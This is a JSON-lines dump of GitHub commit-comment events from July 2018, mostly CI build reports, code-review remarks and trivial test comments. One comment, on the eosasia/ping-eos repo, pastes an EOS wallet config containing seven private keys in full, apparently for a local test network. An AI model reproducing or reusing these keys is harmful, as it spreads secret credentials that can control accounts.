{"id":"7947800308","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29666133,"position":null,"line":null,"path":null,"commit_id":"5236cb93ceae0d00e6b06e62c6e4ddf9d580a834","created_at":"2018-07-11T05:11:49Z","updated_at":"2018-07-11T05:11:49Z","author_association":"NONE","body":"fuel-cell-thermal-fixes (EnergyArchmage) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1683 of 1683 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5236cb93ceae0d00e6b06e62c6e4ddf9d580a834-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5236cb93ceae0d00e6b06e62c6e4ddf9d580a834-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5236cb93ceae0d00e6b06e62c6e4ddf9d580a834-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.0%25-green.png)</a>\n"}},"created_at":"2018-07-11T05:11:49Z"}
{"id":"7947814353","type":"CommitCommentEvent","actor":{"login":"domwashburn"},"repo":{"name":"semantic-release/semantic-release"},"payload":{"comment":{"id":29666164,"position":126,"line":126,"path":"index.js","commit_id":"b4440fe0d38ceb972bdda9ccb24aafb78e8b3cef","created_at":"2018-07-11T05:16:57Z","updated_at":"2018-07-11T05:16:57Z","author_association":"NONE","body":"It's a little late, but the last bug I've encountered is when installing I can't seem to install with \r\n\r\n`npm install --save-dev @scope/scoped-package@beta`\r\n\r\nhowever the package will install with\r\n\r\n`npm install --save-dev @scope/scoped-package`"}},"created_at":"2018-07-11T05:16:57Z"}
{"id":"7947815658","type":"CommitCommentEvent","actor":{"login":"xmatthias"},"repo":{"name":"xmatthias/freqtrade"},"payload":{"comment":{"id":29666168,"position":null,"line":null,"path":null,"commit_id":"748dbb817197fa51ba8746c1e59ffefdfdc8a63d","created_at":"2018-07-11T05:17:25Z","updated_at":"2018-07-11T05:17:25Z","author_association":"OWNER","body":"Sorry, my mistake, i meant @creslinux "}},"created_at":"2018-07-11T05:17:25Z"}
{"id":"7947849827","type":"CommitCommentEvent","actor":{"login":"MilhouseVH"},"repo":{"name":"chewitt/LibreELEC.tv"},"payload":{"comment":{"id":29666224,"position":null,"line":null,"path":null,"commit_id":"e2dba1d27a86dec152d165fed1b7fe9e8ef8c1aa","created_at":"2018-07-11T05:29:29Z","updated_at":"2018-07-11T05:29:29Z","author_association":"NONE","body":"`packages/sysutils/cpumac/config/cpumac` is a script, so put it in `packages/sysutils/cpumac/scripts`.\r\n\r\nI'd also call it `cpumac-config` (somewhat consistent with other scripts that generate config files, `samba-config`, `kodi-config` etc.).\r\n\r\nAssuming it creates the config files every time the system boots, why not create the config files in `/run/libreelec` (as we do with `kodi-config`)? Is there any benefit to having the config files persist across boots? There doesn't seem to be any opportunity for the user to persist a modification, as these files are totally transient.\r\n\r\nWhere is the `wlan0` service that creates the wlan config?\r\n\r\nAnd a nit: can you move `PKG_TOOLCHAIN=\"manual\"` below `PKG_LONGDESC`, as that seems to be the \"norm\"."}},"created_at":"2018-07-11T05:29:29Z"}
{"id":"7947852553","type":"CommitCommentEvent","actor":{"login":"idsb3t1"},"repo":{"name":"idsb3t1/UI-ys1int-KEEP-TC"},"payload":{"comment":{"id":29666230,"position":null,"line":null,"path":null,"commit_id":"7bd3a4195db7725c2b2851a506c6397e8fa91504","created_at":"2018-07-11T05:30:27Z","updated_at":"2018-07-11T05:30:27Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.stage1.bluemix.net/devops/toolchains/ee7af0c7-eb4b-4808-84ae-65a1ebf892f4?env_id=ibm%3Ays1%3Aus-south \"UI-ys1int-KEEP-TC\"): [Delivery Pipeline](https://console.stage1.bluemix.net/devops/pipelines/9602ba9a-db4c-42c8-81d1-69655e515efe?env_id=ibm%3Ays1%3Aus-south \"UI-ys1int-KEEP-TC\") deployed [UI-ys1int-KEEP-TC](https://github.com/idsb3t1/UI-ys1int-KEEP-TC/releases/tag/deploy-ibm-ys1-us-south-idsb3t2-us.ibm.com-dev-20180711-053025 \"deploy-ibm-ys1-us-south-idsb3t2-us.ibm.com-dev-20180711-053025\") to [dev](https://console.stage1.bluemix.net/apps/e0173942-fbb5-42df-a8ff-cca49f037241?env_id=ibm:ys1:us-south \"ibm:ys1:us-south:idsb3t2@us.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-11T05:30:27Z"}
{"id":"7947852592","type":"CommitCommentEvent","actor":{"login":"lianliange85"},"repo":{"name":"lianliange85/open-up"},"payload":{"comment":{"id":29666231,"position":null,"line":null,"path":null,"commit_id":"3fffbe4dc3d315179b3735114601956c8e32848b","created_at":"2018-07-11T05:30:28Z","updated_at":"2018-07-11T05:30:28Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-11T05:30:28Z"}
{"id":"7947853652","type":"CommitCommentEvent","actor":{"login":"bpasero"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":29666233,"position":45,"line":73,"path":"src/vs/workbench/api/node/extHostProgress.ts","commit_id":"098cf01a2e35d00206ec29c4e95cfc7d308afdc6","created_at":"2018-07-11T05:30:52Z","updated_at":"2018-07-11T05:30:52Z","author_association":"MEMBER","body":"@vector-of-bool good catch, but with https://github.com/Microsoft/vscode/commit/8f825bbcb59edbcf883ce5d8fdee20f9745332c6 the code changed to this:\r\n\r\n```typescript\r\nfunction mergeProgress(result: IProgressStep, currentValue: IProgressStep): IProgressStep {\r\n\tresult.message = currentValue.message;\r\n\tif (typeof currentValue.increment === 'number' && typeof result.message === 'number') {\r\n\t\tresult.increment += currentValue.increment;\r\n\t} else if (typeof currentValue.increment === 'number') {\r\n\t\tresult.increment = currentValue.increment;\r\n\t}\r\n\treturn result;\r\n}\r\n```\r\n\r\nSo I would assume that the else branch always gets executed and the increment works properly. If not, please file an issue and we discuss there."}},"created_at":"2018-07-11T05:30:52Z"}
{"id":"7947854790","type":"CommitCommentEvent","actor":{"login":"ajratner"},"repo":{"name":"HazyResearch/snorkel"},"payload":{"comment":{"id":29666235,"position":null,"line":null,"path":null,"commit_id":"ae87627fc51dedaa3097df6186cc22edffa9d0eb","created_at":"2018-07-11T05:31:16Z","updated_at":"2018-07-11T05:31:16Z","author_association":"CONTRIBUTOR","body":"@jason-fries I think this was just a typo?"}},"created_at":"2018-07-11T05:31:16Z"}
{"id":"7947854845","type":"CommitCommentEvent","actor":{"login":"smiths"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29666236,"position":48,"line":1118,"path":"CaseStudies/glass/docs/SRS/glassbr_srs.tex","commit_id":"1514d32e3d926af7e7bde94fcb81cf4a61323db3","created_at":"2018-07-11T05:31:17Z","updated_at":"2018-07-11T05:31:17Z","author_association":"OWNER","body":"@samm82 this sounds like a great idea.  I'd like to see more examples of projects.  Also, I like little issues that can be closed relatively quickly.  It keeps track of the clutter, and it feels like we are making progress.  😄 "}},"created_at":"2018-07-11T05:31:17Z"}
{"id":"7947860999","type":"CommitCommentEvent","actor":{"login":"ElvishJerricco"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29666252,"position":5,"line":76,"path":"pkgs/top-level/haskell-packages.nix","commit_id":"c85f23a82a6ae9a5b38a789897e455b11983e528","created_at":"2018-07-11T05:33:37Z","updated_at":"2018-07-11T05:33:37Z","author_association":"CONTRIBUTOR","body":"@peti Not currently. Just wondering if we *should* have it instead of `ghc821Binary`, if it can build all the same GHCs."}},"created_at":"2018-07-11T05:33:37Z"}
{"id":"7947861362","type":"CommitCommentEvent","actor":{"login":"cgcloud-jenkins"},"repo":{"name":"vgteam/vg"},"payload":{"comment":{"id":29666253,"position":null,"line":null,"path":null,"commit_id":"3ac239a75ef3ccb10af48e6ea4455aa9b9033c33","created_at":"2018-07-11T05:33:45Z","updated_at":"2018-07-11T05:33:45Z","author_association":"NONE","body":"[Jenkins vg tests](http://jenkins.cgcloud.info/job/vg/1987/) complete for merge to master.  View the [full report here](http://cgl-pipeline-inputs.s3.amazonaws.com/vg_cgl/vg_ci/jenkins_reports/branch/master/index.html).\n\n19 tests passed, 0 tests failed and 10 tests skipped in 21617 seconds\n\nTests produced 2925 warnings. 2925 were for lower-than-expected alignment scores\n\n"}},"created_at":"2018-07-11T05:33:45Z"}
{"id":"7947862621","type":"CommitCommentEvent","actor":{"login":"githubuserdlp"},"repo":{"name":"githubuserdlp/TEST"},"payload":{"comment":{"id":29666255,"position":null,"line":null,"path":null,"commit_id":"ca9076bc653865997690d0e94ce94f52fff90ba9","created_at":"2018-07-11T05:34:15Z","updated_at":"2018-07-11T05:34:15Z","author_association":"OWNER","body":"\r\n{ENTER}\r\n[f11072018053401_download.txt](https://github.com/githubuserdlp/TEST/files/2183090/f11072018053401_download.txt)\r\n"}},"created_at":"2018-07-11T05:34:15Z"}
{"id":"7947863112","type":"CommitCommentEvent","actor":{"login":"aa1214808834"},"repo":{"name":"aa1214808834/aa1214808834.github.com"},"payload":{"comment":{"id":29666256,"position":null,"line":null,"path":null,"commit_id":"1593c616b98d7bb1102bae9bc6a832743fc8760c","created_at":"2018-07-11T05:34:26Z","updated_at":"2018-07-11T05:34:26Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-11T05:34:26Z"}
{"id":"7947870522","type":"CommitCommentEvent","actor":{"login":"covers1624"},"repo":{"name":"MinecraftForge/MinecraftForge"},"payload":{"comment":{"id":29666267,"position":null,"line":null,"path":null,"commit_id":"fe3478f233e9b3934ddc80330cb0f333b0a7ea1a","created_at":"2018-07-11T05:37:10Z","updated_at":"2018-07-11T05:37:10Z","author_association":"CONTRIBUTOR","body":"@Brandon3055"}},"created_at":"2018-07-11T05:37:10Z"}
{"id":"7947873344","type":"CommitCommentEvent","actor":{"login":"7keo"},"repo":{"name":"7keo/ParadoxPlazaMod-for-Vic2-v3.04"},"payload":{"comment":{"id":29666273,"position":null,"line":null,"path":null,"commit_id":"50653a010d8f013652bf93bed087bbc44fdb207e","created_at":"2018-07-11T05:38:15Z","updated_at":"2018-07-11T05:38:15Z","author_association":"OWNER","body":"fixed crash when opening a country's _Decisions_ tab in the _Politics_ window."}},"created_at":"2018-07-11T05:38:15Z"}
{"id":"7947876414","type":"CommitCommentEvent","actor":{"login":"ivancombs"},"repo":{"name":"ivancombs/Hello-world"},"payload":{"comment":{"id":29666277,"position":2,"line":2,"path":"README.md","commit_id":"d0949f1a2b14c1b4fbe9640d08dc9c684a407677","created_at":"2018-07-11T05:39:26Z","updated_at":"2018-07-11T05:39:26Z","author_association":"OWNER","body":"loving my life with my fiance"}},"created_at":"2018-07-11T05:39:26Z"}
{"id":"7947884061","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29666284,"position":null,"line":null,"path":null,"commit_id":"7c85d4a6f9252eaed827a95f5dc72e69140ba112","created_at":"2018-07-11T05:42:15Z","updated_at":"2018-07-11T05:42:15Z","author_association":"NONE","body":"issue_6729 (mbadams5) - Win64-Windows-7-VisualStudio-14: OK (2933 of 2933 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7c85d4a6f9252eaed827a95f5dc72e69140ba112-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7c85d4a6f9252eaed827a95f5dc72e69140ba112-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-11T05:42:15Z"}
{"id":"7947884483","type":"CommitCommentEvent","actor":{"login":"creslin"},"repo":{"name":"xmatthias/freqtrade"},"payload":{"comment":{"id":29666285,"position":null,"line":null,"path":null,"commit_id":"748dbb817197fa51ba8746c1e59ffefdfdc8a63d","created_at":"2018-07-11T05:42:24Z","updated_at":"2018-07-11T05:42:24Z","author_association":"NONE","body":"Ah I see, no worries then, thanks for the clarification.\n"}},"created_at":"2018-07-11T05:42:24Z"}
{"id":"7947888960","type":"CommitCommentEvent","actor":{"login":"DinoChan"},"repo":{"name":"DinoChan/first-pr"},"payload":{"comment":{"id":29666293,"position":null,"line":null,"path":null,"commit_id":"6f9f0fabb03fe289665a8213ef5f5fb1ee7ce63e","created_at":"2018-07-11T05:44:05Z","updated_at":"2018-07-11T05:44:05Z","author_association":"OWNER","body":"sss"}},"created_at":"2018-07-11T05:44:05Z"}
{"id":"7947894928","type":"CommitCommentEvent","actor":{"login":"GaiaWorksMobile"},"repo":{"name":"GaiaWorksMobile/react-native-beacons-android"},"payload":{"comment":{"id":29666306,"position":null,"line":null,"path":null,"commit_id":"4664eb7bf1299849d1b9470fdfa34dc733a1f19b","created_at":"2018-07-11T05:46:12Z","updated_at":"2018-07-11T05:46:12Z","author_association":"OWNER","body":"4.0-4.04和4.1.0通用 "}},"created_at":"2018-07-11T05:46:12Z"}
{"id":"7947896231","type":"CommitCommentEvent","actor":{"login":"GaiaWorksMobile"},"repo":{"name":"GaiaWorksMobile/react-native-beacons-android"},"payload":{"comment":{"id":29666309,"position":null,"line":null,"path":null,"commit_id":"4664eb7bf1299849d1b9470fdfa34dc733a1f19b","created_at":"2018-07-11T05:46:41Z","updated_at":"2018-07-11T05:46:41Z","author_association":"OWNER","body":"Version4.0-4.04和Version4.1.0通用 "}},"created_at":"2018-07-11T05:46:41Z"}
{"id":"7947897648","type":"CommitCommentEvent","actor":{"login":"KanchannaA"},"repo":{"name":"KanchannaA/todaydevops"},"payload":{"comment":{"id":29666313,"position":null,"line":null,"path":null,"commit_id":"a6c365547e9890d02aacfa567d61361767d775da","created_at":"2018-07-11T05:47:14Z","updated_at":"2018-07-11T05:47:14Z","author_association":"OWNER","body":"committing file"}},"created_at":"2018-07-11T05:47:14Z"}
{"id":"7947903691","type":"CommitCommentEvent","actor":{"login":"dstopp"},"repo":{"name":"SETI/pds-opus"},"payload":{"comment":{"id":29666326,"position":null,"line":null,"path":null,"commit_id":"fe3e37215bbab412ae0fc44134243943afa6b694","created_at":"2018-07-11T05:49:22Z","updated_at":"2018-07-11T05:49:22Z","author_association":"COLLABORATOR","body":"glyphicon font/spacing tweaking "}},"created_at":"2018-07-11T05:49:22Z"}
{"id":"7947911161","type":"CommitCommentEvent","actor":{"login":"DinoChan"},"repo":{"name":"DinoChan/first-pr"},"payload":{"comment":{"id":29666333,"position":null,"line":null,"path":null,"commit_id":"a7520457d9c0d5c2bf2e7a510c250ca3d87a2702","created_at":"2018-07-11T05:51:51Z","updated_at":"2018-07-11T05:51:51Z","author_association":"OWNER","body":"first commit"}},"created_at":"2018-07-11T05:51:51Z"}
{"id":"7947913684","type":"CommitCommentEvent","actor":{"login":"wkddnfls"},"repo":{"name":"urhanna/GitDemo"},"payload":{"comment":{"id":29666334,"position":null,"line":null,"path":null,"commit_id":"617ca856994773d3ef171dc687c36e19dd249682","created_at":"2018-07-11T05:52:42Z","updated_at":"2018-07-11T05:52:42Z","author_association":"COLLABORATOR","body":"hi may name is woolin"}},"created_at":"2018-07-11T05:52:42Z"}
{"id":"7947914198","type":"CommitCommentEvent","actor":{"login":"urhanna"},"repo":{"name":"urhanna/GitDemo"},"payload":{"comment":{"id":29666336,"position":null,"line":null,"path":null,"commit_id":"7079c825074d7a0a18b25dd4dd849037b55e91a1","created_at":"2018-07-11T05:52:54Z","updated_at":"2018-07-11T05:52:54Z","author_association":"OWNER","body":"daheedaheedahee"}},"created_at":"2018-07-11T05:52:54Z"}
{"id":"7947917137","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/nano-css"},"payload":{"comment":{"id":29666341,"position":null,"line":null,"path":null,"commit_id":"769bc19bf5f7e57e45af7debf0752f3304fa2ea0","created_at":"2018-07-11T05:53:58Z","updated_at":"2018-07-11T05:53:58Z","author_association":"OWNER","body":"Build version: __`2.1.0-renovate/react-test-renderer-16.x.54`__ :crossed_fingers: [`renovate/react-test-renderer-16.x`](https://github.com/streamich/nano-css/tree/renovate/react-test-renderer-16.x) on [*CircleCI*](https://circleci.com/gh/streamich/nano-css/54) :tada:"}},"created_at":"2018-07-11T05:53:58Z"}
{"id":"7947921183","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29666353,"position":null,"line":null,"path":null,"commit_id":"df9ddbf4d9859b7c4307cd4b02595a3c77d0f4a6","created_at":"2018-07-11T05:55:26Z","updated_at":"2018-07-11T05:55:26Z","author_association":"NONE","body":"179D_Reporting-v8.8.0 (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2932 of 2932 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-df9ddbf4d9859b7c4307cd4b02595a3c77d0f4a6-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-df9ddbf4d9859b7c4307cd4b02595a3c77d0f4a6-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-11T05:55:26Z"}
{"id":"7947929276","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29666370,"position":null,"line":null,"path":null,"commit_id":"5c6c9482ba36d602a4c6a1bff279706ff4d972d1","created_at":"2018-07-11T05:58:17Z","updated_at":"2018-07-11T05:58:17Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 711](https://travis-ci.org/per1234/arduino-ci-script/builds/402515024) will be found at:\nhttps://gist.github.com/arduino-ci-script-bot/9371a7dedb73a560142ff2ca514b79db#file-travis_ci_job_report_00711-001-tsv"}},"created_at":"2018-07-11T05:58:17Z"}
{"id":"7947929554","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29666371,"position":null,"line":null,"path":null,"commit_id":"5c6c9482ba36d602a4c6a1bff279706ff4d972d1","created_at":"2018-07-11T05:58:23Z","updated_at":"2018-07-11T05:58:23Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 711](https://travis-ci.org/per1234/arduino-ci-script/builds/402515024) will be found at:\nhttps://github.com/per1234/CI-reports/tree/arduino-ci-script/build_00711"}},"created_at":"2018-07-11T05:58:23Z"}
{"id":"7947931305","type":"CommitCommentEvent","actor":{"login":"rchl"},"repo":{"name":"resoai/TileBoard"},"payload":{"comment":{"id":29666372,"position":5,"line":530,"path":"TILE_EXAMPLES.md","commit_id":"d32189e2d5140d3c1ccfc5d9efc29f65a5505b29","created_at":"2018-07-11T05:59:01Z","updated_at":"2018-07-11T05:59:01Z","author_association":"NONE","body":"I wonder why it's `icons` here and `iconMap` in weather tile. Probably should be consistent.\r\n\r\nAlso, maybe would be worth to consolidate `icon`/`icons`/`iconMap` into just `icon` which could be set to a mapping object? Would be a breaking change though."}},"created_at":"2018-07-11T05:59:01Z"}
{"id":"7947932405","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29666374,"position":23,"line":255,"path":"Source/Foundation/bsfCore/Private/RTTI/BsMaterialParamsRTTI.h","commit_id":"f66b81380ac2e0165f4d68abf8db01c7875fd192","created_at":"2018-07-11T05:59:25Z","updated_at":"2018-07-11T05:59:25Z","author_association":"CONTRIBUTOR","body":"Oops. Yea you're right. Forgot that std::array only worked with compile-time size. \r\n\r\nI started working on a dynamic array class, but honestly the more time I spent on it the more I felt that the cure was worse than the disease, at least with the design I was trying out.\r\n\r\nHere's what my WIP code looks like.\r\n\r\nnamespace bs\r\n{\r\n\r\ntemplate<typename T, typename Alloc, typename Delete = decltype(&bs_free<T, Alloc>)>\r\nstruct DynArray : public UPtr<T[], Alloc, Deleter>\r\n{\r\n        using Base_t = UPtr<T[], Alloc, Deleter>;\r\n\r\n        explicit DynArray(T * buffer = nullptr, Deleter del = &bs_free<T, Alloc>())\r\n         : Base_t(buffer, std::move(del))\r\n        { }\r\n\r\n        static DynArray create(size_t size, Deleter del = &bs_free<T,Alloc>())\r\n        {\r\n                return DynArray(MemoryAllocator<Alloc>::allocate(count*sizeof(T)), std::move(del));\r\n        }\r\n\r\n        void resize(size_t size, Deleter del = &bs_free<T,Alloc>())\r\n        {\r\n                Base_t::reset(MemoryAllocator<Alloc>::allocate(count*sizeof(T)));\r\n                 std::move(del));\r\n        }\r\n};\r\n\r\n}\r\n"}},"created_at":"2018-07-11T05:59:25Z"}
{"id":"7947935889","type":"CommitCommentEvent","actor":{"login":"frankli1224"},"repo":{"name":"eosasia/ping-eos"},"payload":{"comment":{"id":29666391,"position":null,"line":null,"path":null,"commit_id":"0a3ff7f62c851d699ad18d3cd5f355220b717749","created_at":"2018-07-11T06:00:34Z","updated_at":"2018-07-11T06:00:34Z","author_association":"NONE","body":"Hi Tyler,\r\n\r\nThank you for your excellent tutorial, I have problem on the front end. My configuration code is shown below:\r\n\r\nconst EOS_CONFIG = {\r\n  contractName: \"ping.ctr\", // Contract name\r\n  contractSender: \"tester\", // User executing the contract (should be paired with private key)\r\n  clientConfig: {\r\n    keyProvider:[[\r\n    \"EOS5BtL6cQsVzMhuujppUTKmVWFY6EYLrDfdraaQnA2BBJYCrxCCb\",\r\n    \"5KCk5d5pAuack1NiqSxTiJsrAiE6wgLxYHGo6JACpMuFJb39NeG\"\r\n  ],[\r\n    \"EOS5GQ7PHBvEPCRWhiA3rNDVrrLYtvoxh7Vvnska9xa4RjkyZvUbH\",\r\n    \"5J38vcyy1CVR9NeAArrZfeAUzjyGEAzJZmJ7paLHqJYKQo6hQC9\"\r\n  ],[\r\n    \"EOS5cDrz8eHLHwW94QSpSwwLFphUCRKYiCyoZ8CoySm6EVMwHCDBE\",\r\n    \"5Jjvnup2dqUGsQ7KhvJgYyohL8jUv9zcWcECHiWyZuALxXZWT5C\"\r\n  ],[\r\n    \"EOS5sGH7Rdch9qHaXLA98NRg1qPrH7UobrZBsdS5Nt7Qd2uJVH8G3\",\r\n    \"5HvCUxF4AVkePfAewWjXyqiApMQ3Yy6NzGKJE2w8WQvtEGvZLqa\"\r\n  ],[\r\n    \"EOS6AT4kMkkiYhDgUeJ8YxupBRWHzu9pLPPicqLnpPN7qViT5TFiU\",\r\n    \"5J5RHaY31VLcZoFUhjfSudyArKu6WWFbdmocaFYojsehENAFKRQ\"\r\n  ],[\r\n    \"EOS6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5GDW5CV\",\r\n    \"5KQwrPbwdL6PhXujxW37FSSQZ1JiwsST4cqQzDeyXtP79zkvFD3\"\r\n  ],[\r\n    \"EOS8MHfK4v7UGHrYKq1beFbrxv8LegKvgaXk4xEcK1ynBRGDqbAvU\",\r\n    \"5KELKQohNbdoJ2MRmHPQh6ef7tFWSpBQ1gCpcjkNKER7hWczwCZ\"\r\n  ]\r\n] , // Your private key\r\n    httpEndpoint: 'http://127.0.0.1:8888' // EOS http endpoint\r\n  }\r\n}\r\n\r\nwhen I click 'ping' button in the localhost:8080 webpage,I got this error:\r\napigen.js:115 AssertionError {name: \"AssertionError\", actual: false, expected: true, operator: \"==\", message: \"expecting public or private keys from keyProvider\", …}\r\n\r\ncan you help me figure out what is the problem with my key provider?\r\n\r\nThank you very much!\r\n\r\nRegards,\r\nFrank"}},"created_at":"2018-07-11T06:00:34Z"}
{"id":"7947937482","type":"CommitCommentEvent","actor":{"login":"RanaSuleman"},"repo":{"name":"ojusave/TicTacToe"},"payload":{"comment":{"id":29666397,"position":null,"line":null,"path":null,"commit_id":"14e18c8b7a256459eeca1b00d594bb3d52d591cb","created_at":"2018-07-11T06:01:05Z","updated_at":"2018-07-11T06:01:05Z","author_association":"NONE","body":"Thanks a lot.....\r\nIt helped me in resolving my issue\r\n"}},"created_at":"2018-07-11T06:01:05Z"}
{"id":"7947942763","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29666411,"position":23,"line":255,"path":"Source/Foundation/bsfCore/Private/RTTI/BsMaterialParamsRTTI.h","commit_id":"f66b81380ac2e0165f4d68abf8db01c7875fd192","created_at":"2018-07-11T06:02:46Z","updated_at":"2018-07-11T06:02:46Z","author_association":"CONTRIBUTOR","body":"A couple major problems.\r\n\r\nOne, the allocator can't be stateful (Or must use global state).\r\nCan't store non-trivial objects in the derived class because unique_ptr has a non-virtual destructor, so if it ever gets destructed as a unique_ptr, you're in trouble.\r\nCould hide that aspect by inheriting privately, but then you have to forward all of the functions you want.\r\nSo with all of those limitations, you're almost better off writing the class entirely from scratch.\r\n\r\nBut you can basically copy the unique_ptr classes rough design on how to best handle it. Just make it take an allocator as well as a deleter.\r\n\r\n\r\nWant that? I can flesh it out more, but I didn't want to waste time on a class that I wasn't sure about."}},"created_at":"2018-07-11T06:02:46Z"}
{"id":"7947950373","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29666425,"position":23,"line":255,"path":"Source/Foundation/bsfCore/Private/RTTI/BsMaterialParamsRTTI.h","commit_id":"f66b81380ac2e0165f4d68abf8db01c7875fd192","created_at":"2018-07-11T06:05:18Z","updated_at":"2018-07-11T06:05:18Z","author_association":"CONTRIBUTOR","body":"Probably would also want a \"resize\" function. \r\n\r\nBut then careful consideration is needed on whether this is a \"raw bytes\" dynamic array, or a dynamic array with stateful objects. If it's stateful, then you'll need to allocate new memory, and move / copy all of the objects to the new memory up to the size available, and then default construct the rest.\r\n\r\nThe more stateful object functionality that gets put into this, the more it looks identical to std::vector.\r\n\r\nBut a dynamic array of just raw bytes is always useful to have. Std vector can be a bit too much for that, from time to time."}},"created_at":"2018-07-11T06:05:18Z"}
{"id":"7947955172","type":"CommitCommentEvent","actor":{"login":"XiaoxingChen"},"repo":{"name":"XiaoxingChen/SJTU-SSL-SRC"},"payload":{"comment":{"id":29666435,"position":7,"line":7,"path":"SRC_Lessons/Lesson3 A Guide to Lua_Scripts.md","commit_id":"553beeb0ff23df5d9a3fdacad4a87d488c5deace","created_at":"2018-07-11T06:06:52Z","updated_at":"2018-07-11T06:06:52Z","author_association":"OWNER","body":"Don't forget to add a \"space\" after \"##\", otherwise the github markdown plug-ins cannot recognize the title syntax.\r\n\r\n```\r\n##××学习目标××\r\n```\r\n```\r\n## ××学习目标××\r\n```"}},"created_at":"2018-07-11T06:06:52Z"}
{"id":"7947955844","type":"CommitCommentEvent","actor":{"login":"Swapnil-ingle"},"repo":{"name":"krishna-waidande/ImportParticipantCsv_plugin"},"payload":{"comment":{"id":29666440,"position":29,"line":32,"path":"src/main/java/com/krishagni/importcsv/core/ParticipantCsvImporter.java","commit_id":"1f4e4a0208a331d19aef0ce101548cac2c6e7152","created_at":"2018-07-11T06:07:06Z","updated_at":"2018-07-11T06:07:06Z","author_association":"NONE","body":"don't use default access modifier."}},"created_at":"2018-07-11T06:07:06Z"}
{"id":"7947963224","type":"CommitCommentEvent","actor":{"login":"mecosu"},"repo":{"name":"mecosu/build-a-blog"},"payload":{"comment":{"id":29666458,"position":null,"line":null,"path":null,"commit_id":"7a5bc56fb83c6baae8d5dd194fae2adc509fe092","created_at":"2018-07-11T06:09:30Z","updated_at":"2018-07-11T06:09:30Z","author_association":"OWNER","body":"Also added datetime to sort blog posts by most recent."}},"created_at":"2018-07-11T06:09:30Z"}
{"id":"7947968726","type":"CommitCommentEvent","actor":{"login":"mwojtkowski"},"repo":{"name":"mwojtkowski/Ovale"},"payload":{"comment":{"id":29666473,"position":null,"line":null,"path":null,"commit_id":"9924643cb4a507f1dfbfa402d46ca46797405454","created_at":"2018-07-11T06:11:18Z","updated_at":"2018-07-11T06:11:18Z","author_association":"OWNER","body":"@ShmooDude thanks for letting me know that \"lust\" work with \"|PLAYER\" flag.\r\n\r\nAfter that talk with sirTribble I added option to disable / enable \"|PLAYER\" flag on duffs/debuffs (by default it is set to disabled but that can be changed)\r\n\r\nYou can see it here https://github.com/mwojtkowski/Ovale/commit/0f682e9a9dccff07572e60de05938116b2a30864\r\n"}},"created_at":"2018-07-11T06:11:18Z"}
{"id":"7947969113","type":"CommitCommentEvent","actor":{"login":"dev-haran"},"repo":{"name":"muralivijay/android_device_xiaomi_rolex"},"payload":{"comment":{"id":29666476,"position":null,"line":null,"path":null,"commit_id":"a8c175b91f1b9a61005412c92176f8445786b1bd","created_at":"2018-07-11T06:11:27Z","updated_at":"2018-07-11T06:11:27Z","author_association":"CONTRIBUTOR","body":"Awesome method bro"}},"created_at":"2018-07-11T06:11:27Z"}
